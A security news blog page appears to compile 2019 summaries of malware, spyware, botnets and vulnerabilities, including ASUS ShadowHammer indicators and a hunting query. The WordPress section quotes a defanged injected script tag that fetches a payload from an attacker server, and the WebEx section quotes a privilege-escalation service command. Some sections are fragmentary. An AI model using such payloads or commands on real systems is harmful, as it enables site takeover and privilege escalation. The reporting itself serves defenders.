My information Resource (blog.mir.net)

     With today’s cyber-focused society, there are numerous security companies constantly on the lookout for new variants of malware and threats that haven’t been seen before. So when new malware is discovered that not only provides a wide array of capabilities but also remained under the radar for 5 years, it begs further investigation. Researchers at Kaspersky Lab recently uncovered such a malware, which they dubbed TajMahal.

     TajMahal is a highly modular piece of malware that was discovered in late 2018 attacking a Central Asian diplomatic agency. It contains 80 different plugins for various capabilities, one of the highest amounts ever seen with an APT. The developers of TajMahal have also made it very stealthy, including using behavioral detection avoidance and creating a new codebase from the ground up rather than using existing code from other sources. The malware contains 2 main modules: Tokyo and Yokohama. 

     While the initial stage of infection is unclear, the first stage of TajMahal is the Tokyo package. This contains 3 modules that install backdoors on the system, run PowerShell scripts, and establish contact with command and control servers. This module then downloads the second package, Yokohama.
  Yokohama is the main data exfiltration module that contains most of the plugins used for obtaining data. It includes “backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine” according to the re Exodus searchers. It can even see files that were accessed on removed USB drives and then copy that specific file the next time the drive is plugged in. The stolen data is exfiltrated using an XML file named TajMahal, hence the name researchers gave the malware itself.

  While TajMahal has only been seen attacking the one organization, researchers have found some aspects of the malware that lead them to believe there may be other versions out in the wild that haven’t been detected yet. Samples studied so far suggest that the group behind the malware has been active since the Fall of 2014, so it is doubtful this will be the last that is seen from them.
Sources:
• https://thehackernews.com/2019/04/apt-malware-framework.html 
• https://threatpost.com/meettajmahal/143644/ 
• https://securelist.com/projecttajmahal/90240/

  The Exodus spyware now also exists in the iOS ecosystem. The package can take and deliver audio recordings, pictures, contacts, and location data. The spyware researchers note that the iOS version of the spyware delivers itself via phishing sites that imitate mobile carriers from Italy and Turkmenistan. According to research by both Lookout and Security without Boarders, the spyware appears to have developed over the span of 5 years.

    The spyware works in three stages: first it lands on the victim’s machine with a lightweight dropper, then it fetches a larger second stage payload which contains several binaries, finally, the third stage typically uses the Dirty COW exploit (CVE20165195) to obtain root privileges on the infected device.  Technical details suggest that it may have started life as a legitimate package for government or law-enforcement use. Details indicate that the software was very likely a well-funded project intended for the lawful intercept market. The software makes use of valid certificate-pinning and public key encryption for command-and-control communications, and geo-restrictions, along with a comprehensive well-implemented suite of surveillance features.

   The Android samples led researchers to samples of an iOS variant. The attackers spoofed both Wind Tre SpA, and TMCell sites. An Italian mobile and a Turkmenistan state owned carrier respectively.  In order to spread the iOS version outside of the App Store, the cybercriminals abused Apple’s enterprise provisioning system. Allowing them to sign the apps with legitimate Apple certificates. The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary/in-house apps to their employees without the use of the iOS App Store. The apps themselves dovetail with the phishing sites, recommending that user keep the apps installed and under WiFi coverage to be contacted by operators for assistance.  While the iOS version of the app seems to be more crude than the android counterpart. It might not have the ability to leverage known vulnerabilities, but it was still able to utilize well known API’s to exfiltrate  contacts, photos, videos and audio recordings using a required push notification setting.

   Exodus is thought to be linked to eSurv, an Italian software developer based in Catanzaro in Calabria who is well known for software specializing in CCTV management, surveillance drone, and facial and license-plate recognition software. eSurv is currently under investigation by Italian authorities per local news reports.  Each of the phishing sites contain links to metadata such as the application name, version, icon, and an URL for the IPA file.  An IPA package must contain a mobile provisioning profile with an enterprise’s certificate to be distributed outside the app store. All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L. 

Sources:
• https://it.slashdot.org/story/19/04/08/221253/exodus-spyware-foundtargeting-apple-ios-users
• https://threatpost.com/exodus-spyware-apple-ios/143544/

Executive summary

ASUS has also implemented a fix in the latest version (ver. 3.6.8) of the Live Update software, introduced multiple security verification mechanisms to prevent any malicious manipulation in the form of software updates or other means, and implemented an enhanced end-to-end encryption mechanism. At the same time, we have also updated and strengthened our server-to-end-user software architecture to prevent similar attacks from happening in the future.
Additionally, we have created an online security diagnostic tool to check for affected systems, and we encourage users who are still concerned to run it as a precaution. The tool can be found here: https://dlcdnets.asus.com/pub/ASUS/nb/Apps_for_Win10/ASUSDiagnosticTool/ASDT_v1.0.1.0.zip
Users who have any additional concerns are welcome to contact ASUS Customer Service.

More information about APT groups: https://www.fireeye.com/current-threats/apt-groups.html

• How do I know whether or not my device has been targeted by the malware attack?

Only a very small number of specific user group were found to have been targeted by this attack and as such it is extremely unlikely that your device has been targeted. However, if you are still concerned about this matter, feel free to use ASUS’ security diagnostic tool or contact ASUS Customer Service for assistance.

• What should I do if my device is affected?

Immediately run a backup of your files and restore your operating system to factory settings. This will completely remove the malware from your computer. In order to ensure the security of your information, ASUS recommends that you regularly update your passwords.

• How do I make sure that I have the latest version of ASUS Live Update?

You can find out whether or not you have the latest version of ASUS Live Update by following the instructions shown in the link below:
https://www.asus.com/support/FAQ/1018727/

• Have other ASUS devices been affected by the malware attack?

No, only the version of Live Update used for notebooks has been affected. All other devices remain unaffected.

​//Event types that may be associated with the implant or container

union ProcessCreationEvents, NetworkCommunicationEvents, FileCreationEvents, ImageLoadEvents

| where EventTime > ago(30d)

//File SHAs for implant and container

| where InitiatingProcessSHA256 in("e01c1047001206c52c87b8197d772db2a1d3b7b4", 

"e005c58331eb7db04782fdf9089111979ce1406f", "69c08086c164e58a6d0398b0ffdcb957930b4cf2")

​//Download domain

NetworkCommunicationEvents

| where EventTime > ago(30d)

| where RemoteUrl == "asushotfix.com" or RemoteIP == "141.105.71.116"

ASUSTeK Computer Inc. 

Status: This certificate has expired and is no longer valid.

Issuer DigiCert SHA2 Assured ID Code Signing CA

Valid from 12:00 AM 07/27/2015

Valid to 12:00 PM 08/01/2018

Valid usage Code Signing

Algorithm sha256RSA

Thumbprint 29935023FF1386F5F0A0355B778B0DFF2022E196

Serial number 0F F0 67 D8 01 F7 DA EE AE 84 2E 9F E5 F6 10 EA

ASUSTeK Computer Inc. 

Status: Valid

Issuer DigiCert SHA2 Assured ID Code Signing CA

Valid from 12:00 AM 06/20/2018

Valid to 12:00 PM 06/22/2021

Valid usage Code Signing

Algorithm sha256RSA

Thumbprint 626646D29C5B0E7C53AA84698A4A97BE323CF17F

Serial number 05 E6 A0 BE 5A C3 59 C7 FF 11 F4 B4 67 AB 20 FC

• https://shadowhammer.kaspersky.com/

   A bug was discovered this week in Google Photos, where all photos in a users Google Photo account could have their metadata easily read and collected. Bad actors would target a particular query, for example, a location, and then measure the time it takes for the website to respond. Even though the response might be an access denied, there is value in knowing it’s presence or not. It is possible to confirm or deny the presence of particular tags in the photo when using this cross site search method of attack.

    Location is probably one of the more dangerous pieces of information that can be leaked using this attack as it is possible to build a timeline of the victim’s travels and location using consecutive searches. In the original report of this issue, the researcher was able to divine the approximate date and time of a visit to another country using a malicious website by interacting with a logged in google photos account.

    While this attack doesn’t give any access to the photos themselves, or anything other than whether or not the specified terms/queries exist, the benefits can be extrapolated out to schedules and can allow for more finely crafted malvertisements or phishing attempts. One could imagine a malware ridden site harvesting emails, gaining access to location information, and then sending malicious emails being sent concerning issues with travel expenses to a location which is lent more credence by the fact that our victim has traveled to the given location within the time frame that the email is sent.

   While this exploit in particular has been patched, there are countless other browser side attacks that can be exploited, and safeguarding your data is paramount. This attack shows how a clever adversary can wield information no matter how small the leakage. Tools are available for content control to prevent data leakage. Tools such as PuriFile can help you manage metadata, scrub documents of sensitive terms and information, and even help detect data that may be obfuscated.

Sources:
• https://www.zdnet.com/article/google-photos-vulnerability-could-have-let-hackers-retrieve-image-metadata/

• https://www.imperva.com/blog/now-patched-google-photos-vulnerabilitylet-hackers-track-your-friends-and-location-history/

Thanks to Peraton for this information

Please share important information  this with those who you know.

Whether as the result
of isolation, diminished cognition, financial insecurity, trusting too much,
being ashamed to report being scammed or concerned about how relatives will
react, serious concern for health or other causes, many of these crimes go
unreported.

Information on The Federal Bureau of
Investigation Site

https://www.fbi.gov/scams-and-safety/common-fraud-schemes/seniors

This free event has lots of good content the session are listed below. the event is Streaming Live April 16 , 9-12 noon PT.
To register go here

In November of 2018 Forbes ran an article about the increase of cryptojacking. At the time the Cyber Threat Alliance (CTA) was indicating a 629% increase of infections in just the short time between Q1 to Q2 of 2018. Threats had grown from an estimated 400,000 (Q4 2017) infections to 2.5 million infected machines in Q2 of 2018. 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has grown. For example the Russian threat, WebCobra, that McAfee Labs researchers found, was able to drop one of two different payloads based on architecture it detected on the infected machine.

The threats are continuing to become more sophisticated as well.  360 Total Security researchers have released the details of the newer PsMiner malware. Designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SqlServer to spread from server to server to mine for Monero.

The worm uses a file called Systemctl.exe written in the Go language to bundle then download the exploit modules and to attack Windows servers. In addition to the exploits, PsMiner has the ability to brute force its way in to a system. When it detects weak or default credentials, it can utilize a brute force password cracking component.

Once it PsMiner has access to a system, it then uses a PowerShell command to download a WindowsUpdate.ps1 with a malicious payload and master module that will drop the Monero miner on the system. The malware then copies itself into the temp directory and create a scheduled task called “Update service for Windows Service” that will run once every 10 minutes to prolong and refresh the infection. Using the XMRig CPU miner and a custom mining profile while using Living-off-the-Land (LotL) techniques, the worm can persist for some time.

This also shows a level of sophistication to which the bad actors have access.  Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking malware on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These Apps have been since removed from the Microsoft store, but show a troubling pattern of predatory behavior.  Estimates are indicating that there have been ten times more organizations affected by cryptojacking than ransomware just last year. It is clear that cryptojacking is still a threat to consider in 2019.

Sources
• https://www.bleepingcomputer.com/news/security/malware-spreads-as-a -worm-uses-cryptojacking-module-to-mine-for-monero/

• https://www.forbes.com/sites/rachelwolfson/2018/11/13/cryptojackingon-the-rise-webcobra-malware-uses-victims-computers-to-minecryptocurrency/#20183346c336

• https://blog.malwarebytes.com/cybercrime/2018/02/state-maliciouscryptomining/

    Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t. All this without having the effort of hauling those things around a labyrinth of smells and sounds! And with the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you have a desire to pick up where you left off if a sudden pressing matter arises, or you simply lose interest for the time being. But WordFence security researchers have noticed a flaw in the execution of the Abandoned Cart plugin which enables a complete site takeover along with laying a secondary backdoor to regain access in case of discovery.

    The Abandoned Cart plugin had a distinct lack of sanitation on the input and output of fields used when a user begins checking out. The billing_first_name and billing_last_name data fields are stored as entered. The two fields are then displayed concatenated in a customer field when the administrator logs in to view their dashboard.  The attack creates random first and last names and random email addresses to be acceptable form entries, but enters both the first and the last name as the billing_first_name entry and “<script src=hXXps://bit[.]ly/2SzpVBY></script>“ as the billing_last_name field. The URL points to a Command control server, “hXXps://cdn-bigcommerce[.]com/ visionstat.js” which contains a malicious JavaScript payload.

    The attacker first uses the victim’s browser session to make trusted actions on the WordPress website using hidden iframes, acting while the user is unaware of the invasion occurring. The first action taken is creating an administrative user for the site to which the attacker has the credentials. Who needs a backdoor, when you create keys to the front door for yourself? The user to these clandestine accounts has consistently been found to be “woouser” with a “woouser” email at mailinator, a free disposable email.  The malicious JavaScript then infects an inactive plugin with a malicious script that still listens for commands from the C2 server. The script can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server and a confirmation email is sent to the mailinator address to confirm the administrator account.

    A patch for this vulnerability was released, which uses WordPress’ own data sanitizer to exclude names beginning with “<“ and any account with “woouser” in the email. While this prevents the initial attack from creating adversary controlled accounts, it doesn’t address the code injection in the deactivated plugins.

Sources:
https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cartplugin-leads-to-wordpress-site-takeovers/

https:// nakedsecurity.sophos.com/2019/03/13/update-now-wordpress-abandoned-cartplugin-under-attack/Cryptojacking

     A new elevation of privilege vulnerability has been discovered in the Cisco WebEx Meetings desktop app for Windows® by security researcher Marcos Accossatto from SecureAuth Exploits’ Writers Team.

     This vulnerability, tracked as CVE-2019-1674, is an OS Command Injection that can be used to bypass new controls that Cisco put in place after patching a previously disclosed DLL hijacking issue in 2018. This vulnerability could allow a local attacker to elevate their privileges by invoking the update service command. An attacker could exploit this flaw by swapping out the Cisco WebEx Meetings update binary with “a previous vulnerable version through a fake update… that will load a malicious DLL.” The researchers also noted that while this vulnerability can only be exploited locally, it could be exploited remotely in an Active Directory setup through operating system remote management tools.

    The update service for Cisco WebEx Meetings uses XML to check against new files when installing an update. However, this vulnerability would fail to validate version numbers of new files. This is how attackers could potentially insert different files into the update service and trick the update service into “updating” the program to an older, insecure version of Cisco WebEx Meetings. According to SecureAuth, “The vulnerability can be exploited by copying to a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn’t work, then 2 should be used).” The research team also released a two-step Proof of Concept showing how this vulnerability can be exploited.

     The timeline for this vulnerability is about 2 months long and is as follows: on Dec. 4, 2018, SecureAuth sent the initial notification to Cisco PSIRT. On Dec. 5, 2018, Cisco confirmed they received the advisory and opened a case for it, and on Dec. 7, 2018, Cisco confirmed that they were able to reproduce the vulnerability and began working on a plan to fix it. On Dec. 10, 2018, Cisco told SecureAuth that the fix for the vulnerability would be generally available by the end of February. After a couple of attempts by SecureAuth to get updates on the status of the patch for the vulnerability, Cisco, on Jan. 22, 2019, said they were still aiming for an end of February release. Finally, on Feb. 11, 2019, Cisco confirmed that Feb. 27, 2019 would be the official disclosure date, and have now disclosed a patch for this security vulnerability.

    If your company uses Cisco WebEx Meetings desktop app on Windows, be sure to update it immediately to avoid any potential attacks due to this vulnerability.
Sources: 
• https://www.bleepingcomputer.com/news/security/new-elevation-ofprivilege-vulnerability-found-in-cisco-webex-meetings/
• https://securityaffairs.co/wordpress/81751/security/cisco-webex-elevation-privilege.html
• https://www.secureauth.com/labs/advisories/cisco-webex-meetingselevation-privilege-vulnerability

“Necurs is the multitool
of botnets, evolving from operating as a spam botnet delivering banking trojans
and ransomware to developing a proxy service, as well as cryptomining and DDoS
capabilities,” said Mike Benjamin, head of Black Lotus Labs. “What’s
particularly interesting is Necurs’ regular cadence of going dark to avoid
detection, reemerging to send new commands to infected hosts and then going
dark again. This technique is one of many the reasons Necurs has been able to
expand to more than half a million bots around the world.”

Key Takeaways

• Beginning in
  May of 2018, Black Lotus Labs observed regular, sustained downtime of
  roughly two weeks, followed by roughly three weeks of activity for the
  three most active groups of bots comprising Necurs.
• Necurs’ roughly
  570,000 bots are distributed globally, with about half located in the
  following countries, in order of prevalence: India, Indonesia, Vietnam,
  Turkey and Iran. 
• Necurs uses
  a domain generation algorithm (DGA) to obfuscate its operations and avoid
  takedown. However, DGA is a double-edged sword: because the DGA domains
  Necurs will use are known in advance, security researchers can use methods
  like sinkholing DGA domains and analyzing DNS and network traffic to
  enumerate bots and command and control (C2) infrastructure.
• CenturyLink
  took steps to mitigate the risk of Necurs to customers, in addition to
  notifying other network owners of potentially infected devices to help
  protect the internet. 

Additional Resources

• Discover how
  TheMoon has evolved into a proxy as a service: http://news.centurylink.com/2019-01-31-TheMoon-Illustrates-Evolving-Threat-of-IoT-Botnets.
• Learn more
  about Mylobot’s second stage attack: http://news.centurylink.com/2018-11-14-Mylobot-botnet-delivers-one-two-punch-with-Khalesi-malware.
• Find out how
  the Satori botnet is resurfacing with new targets: http://news.centurylink.com/2018-10-29-Satori-botnet-resurfaces-with-new-targets.

SOURCE CenturyLink, Inc.